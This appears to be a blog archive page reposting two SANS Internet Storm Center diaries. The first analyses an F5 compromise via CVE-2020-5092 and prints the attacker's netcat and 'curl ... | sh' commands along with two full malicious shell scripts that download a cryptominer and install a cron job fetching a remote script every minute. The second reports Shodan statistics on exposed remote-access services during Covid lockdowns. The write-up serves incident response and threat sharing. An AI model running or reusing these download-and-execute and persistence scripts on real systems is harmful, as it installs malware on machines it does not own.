Blog

Archive for July 21st, 2020

A few IoCs related to CVE-2020-5092, (Wed, Jul 22nd)

I know I am a bit late to the game, but a couple of weeks ago I responded to an incident resulting from an F5 compromise related to CVE-2020-5092.  As I responded I captured a number if indicators of compromise.  While I have not had a lot of time to dig into them, hopefully they will be of use to somebody.

The F5 vulnerability, CVE-2020-5092 was announced, and patches and workarounds made available, by F5 on June 30, 2020.  This was a CVSS score 10 which essentially meant that if the management interface of the F5 was exposed to the Internet it was trivial to exploit.

On this particular F5, probes for the presence of the vulnerability began on July 3, 2020 and over the course of the subsequent 4 days the device was probed for vulnerability to CVE-2020-5092 2561 times from 364 unique IPs.

The first detectable exploit was executed against the F5 on July 4, 2020.  Exploits continued to be executed against the F5 a number of times over the next few days.  It is hard to gauge the effectiveness of these exploits but there is no indication that any of these exploits achieved an effective foothold in the F5.

The first detectable foothold in the F5 was on July 6, 2020.  As shown in an earlier diary an alias was used to get access to a shell which was used to execute:

nc 217.12.199.179 9999

which resulted in the execution of:

curl 217.12.199.179/i.sh | sh

As of writing 212.12.199.179 is still up and is still serving up the shell scripts related to this attack.

Here are the contents of i.sh

SHA256 – 34e0ad00a23762da270ad5a352d1e523f45a685b4a4931ae02973ecef79140c5 
https://www.virustotal.com/gui/file/34e0ad00a23762da270ad5a352d1e523f45a685b4a4931ae02973ecef79140c5/detection

#!/bin/sh
ulimit -n 65535
rm -f /etc/ld.so.preload

LDR="wget -q -O -"
if [ -s /usr/bin/curl ]; then
 LDR="curl"
fi
if [ -s /usr/bin/wget ]; then
 LDR="wget -q -O -"
fi


WGET="wget -O"
if [ -s /usr/bin/curl ]; then
 WGET="curl -o"
fi
if [ -s /usr/bin/wget ]; then
 WGET="wget -O"
fi

DIR="/tmp"
if [ -e "/tmp/bigip" ]; then
 if [ -w "/tmp/bigip" ] && [ ! -d "/tmp/bigip" ]; then
  if [ -x "$(command -v md5sum)" ]; then
   sum=$(md5sum /tmp/bigip | awk '{ print $1 }')
   echo $sum
   case $sum in
   fa3cf35e7e83175f395a5b6d35fd456d)
    echo "bigip OK"
    ;;
   *)
    echo "bigip wrong"
    rm -rf /tmp/bigip
    sleep 1
    ;;
   esac
  fi
  echo "P OK"
 else
  DIR=$(mktemp -d)/tmp
  mkdir $DIR
  echo "T DIR $DIR"
 fi
else
 if [ -d "/var/tmp" ]; then
  DIR="/var/tmp"
 fi
 echo "P NOT EXISTS"
fi

download() {
 if [ -x "$(command -v md5sum)" ]; then
  sum=$(md5sum $DIR/bigip | awk '{ print $1 }')
  echo $sum
  case $sum in
  fa3cf35e7e83175f395a5b6d35fd456d)
   echo "bigip OK"
   ;;
  *)
   echo "bigip wrong"
   download2
   ;;
  esac
 else
  echo "No md5sum"
  download2
 fi
}
download2() {
 $WGET $DIR/bigip https://bitbucket.org/sozmon3n3/git/raw/master/bigip
 chmod +x $DIR/bigip
 if [ -x "$(command -v md5sum)" ]; then
  sum=$(md5sum $DIR/bigip | awk '{ print $1 }')
  echo $sum
  case $sum in
  fa3cf35e7e83175f395a5b6d35fd456d)
   echo "bigip OK"
   ;;
  *)
   echo "bigip wrong"
   download3
   ;;
  esac
 else
  echo "No md5sum"
  download3
 fi
}

download3() {
 $WGET $DIR/bigip http://217.12.199.179/bigip
 chmod +x $DIR/bigip
 if [ -x "$(command -v md5sum)" ]; then
  sum=$(md5sum $DIR/bigip | awk '{ print $1 }')
  echo $sum
  case $sum in
  fa3cf35e7e83175f395a5b6d35fd456d)
   echo "bigip OK"
   ;;
  *)
   echo "bigip wrong"
   ;;
  esac
 else
  echo "No md5sum"
 fi
}

download
SKL=b $DIR/bigip

crontab -l | grep -e "217.12.199.179" | grep -v grep
if [ $? -eq 0 ]; then
 echo "cron good"
else
 (
  crontab -l 2>/dev/null
  echo "* * * * * $LDR http://217.12.199.179/b.sh | sh > /dev/null 2>&1"
 ) | crontab -
fi

i.sh adds a recurring cron job which executes a script, b.sh from the same IP.

Here are the contents of b.sh.  SHA-256 9994a3ab51521ee54902826d46de3f8c541e625873f10aec2568dd51ddf78f9c
https://www.virustotal.com/gui/file/9994a3ab51521ee54902826d46de3f8c541e625873f10aec2568dd51ddf78f9c/detection

#!/bin/sh
ulimit -n 65535
rm -f /etc/ld.so.preload

LDR="wget -q -O -"
if [ -s /usr/bin/curl ]; then
 LDR="curl"
fi
if [ -s /usr/bin/wget ]; then
 LDR="wget -q -O -"
fi

crontab -l | grep -e "217.12.199.179" | grep -v grep
if [ $? -eq 0 ]; then
 echo "cron good"
else
 (
  crontab -l 2>/dev/null
  echo "* * * * * $LDR http://217.12.199.179/b.sh | sh > /dev/null 2>&1"
 ) | crontab -
fi

i.sh also downloaded an executable called bigip to /var/tmp which launched a process (daemon) on the F5, /tmp/bigipdaemon.

c44b63b1b53cbd9852c71de84ce8ad75f623935f235484547e9d94a7bdf8aa76 bigip
https://www.virustotal.com/gui/file/c44b63b1b53cbd9852c71de84ce8ad75f623935f235484547e9d94a7bdf8aa76/detection

517168df462fd33d5946f8cc6a09090d1dfdac19b10ac8ef8e15e4583557749d  bigipdaemon
https://www.virustotal.com/gui/file/517168df462fd33d5946f8cc6a09090d1dfdac19b10ac8ef8e15e4583557749d/detection

The files are a cryptominer which mines cryptocurrency on behalf of the attacker.  The firewall logs clearly show the cryptominer communicating to the IP in the Ukraine where the shell scripts were downloaded from. 

Besides the IP associated with the cryptomining the attacker also communicated with 9 other Ips. 

Cryptominer IPs
destination_address    destination_port    Country
217.12.199.179    80    Ukraine

Other associated IPs:        
destination_address    destination_port    Country
193.26.217.129    80    Russia
193.53.127.188    80    Russia
213.226.114.20    80    Russia
213.32.10.148    80    France
45.8.228.49    80    Russia
5.23.52.131    80    Russia
62.109.25.117    80    Russia
95.142.44.164    80    Russia
217.8.117.137    80    Russia
 

I hope to get some time in the next few weeks to dig into this further, but hopefully this is of some use to someone in the meantime.  If anyone has any more related IoCs,  please include them in the comments or send them on via the ISC contact page and I will update this diary with the new findings.

— Rick Wanner MSISE – rwanner at isc dot sans dot edu – http://namedeplume.blogspot.com/ – Twitter:namedeplume (Protected)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →

Couple of interesting Covid-19 related stats, (Tue, Jul 21st)

It is nothing new that Covid-19 forced many organizations around the world to quickly adopt the “work from home” model, which in turn resulted in an increased number of machines offering remote access services and protocols accessible from the internet[1,2].

While this is true, going over data gathered from Shodan over this year I noticed that an interesting correlation exists in some cases between the number of machines with accessible protocols for remote access and regionally implemented restrictions on free movement. I call it “interesting” because although one might expect such a correlation to exist, one would probably expect it to always be strongly positive, i.e. that with increased restrictions on free movement would come a significant increase in the number of machines with SSH, Telnet, RDP, VNC, etc. accessible from the internet, followed by a significant decrease following lifting of the restrictions.

That is not always the case however and given the inherent risk associated with allowing unrestricted access to these services from an untrusted external network, I thought it might be interesting to take a short look at recent developments in the number of IPs exposing SSH, RDP and Telnet to the internet in couple of different countries.

A good example of a country where the “expected” increase in numbers may be seen would be Canada. There, both the number of IP addresses and the corresponding percentage of IPs allocated to ISPs in the country both saw a significant increase between the time restrictions on free movement were implemented and the time they were lifted (a large thanks goes to my colleague @inarumlova for providing me with the relevant dates for almost 60 different countries). Since then, the numbers have stayed fairly high however, with only a small drop in the number of IPs with exposed RDP.

Things were a bit more interesting in Austria. There, the number of IPs exposing remote access protocols rose in the time frame when restrictions on free movement were in place (and, in the case of SSH, the numbers fell significantly for a while after the restrictions were lifted), while the percentage of Austrian IP space visible to Shodan, which those IPs represented, steadily decreased.

So far, the expectation of a significant increase in the number of IP addresses with exposed remote access protocols during any “lockdown” period held true.

A country where this expectation would prove to be wrong – at least in the case of RDP – would be the United States. This may be because most restrictions on free movement, which were put in place in the US, were enforced only on a regional or at most state level, or perhaps because organizations in the US chose to provide access to the protocols we’re interested in only through VPN connections. This is only a speculation, however. Whatever the reason, although we may see a steady increase for both SSH and Telnet since the beginning of March, the number of IP addresses with exposed RDP first fell significantly at the beginning of the year and then remained more or less constant with only couple of temporary increases visible in data following implementation of the first travel restrictions.

As we may see, the regional trends don’t necessarily always follow the global ones and may sometimes even be a bit counterintuitive…

[1] https://untrustednetwork.net/en/2020/04/02/open-ports-in-the-time-of-corona/
[2] https://blog.shodan.io/trends-in-internet-exposure/

———–
Jan Kopriva
@jk0pr
Alef Nula

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →